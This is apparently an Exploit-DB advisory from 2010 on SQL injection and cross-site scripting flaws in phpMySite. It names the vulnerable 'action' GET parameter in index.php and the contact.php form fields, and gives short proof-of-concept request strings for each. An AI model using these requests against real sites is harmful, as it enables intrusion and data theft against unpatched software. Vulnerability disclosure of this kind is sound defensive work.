phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities

vendor:

phpmysite

by:

Crux

7,5

CVSS

HIGH

XSS/SQLi

89 (SQL Injection) & 79 (Cross-site Scripting)

CWE

Product Name: phpmysite

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: a:phpmysite:phpmysite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities

This vulnerability affects index.php and can be exploited VIA the GET variable 'action'. This vulnerability affects contact.php and can be exploited via the following POST variables: name, city, email, state, message.

Mitigation:

Input validation and output encoding should be used to prevent XSS and SQLi attacks.

Source

Exploit-DB raw data:

=================================================================
[~] phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities
=================================================================

##########################################################
## Author: Crux
## Homepage: http://hack-tech.com
## Date: 2-27-2010
## Software Link: http://www.phpmysite.com/
## Version: N/A
##########################################################

[ SQLi ]
---------------------------------
// This vulnerability affects index.php
// Can be exploited VIA the GET variable 'action'

[#] Exploit / POC
index.php?action=${SQLINJECTIONHERE}&key=111-222-1933email@address.tst


[ XSS ]
---------------------------------
// This vulnerability affects contact.php
// Can be exploited via the following POST variables:
// name, city, email, state, message

[#] Exploit / POC
name=Crux&city=1>">&state=NY&email=sample%40email%2Etst&message=111-222-1933email@address.tst&word=111-222-1933email@address.tst

=================================================================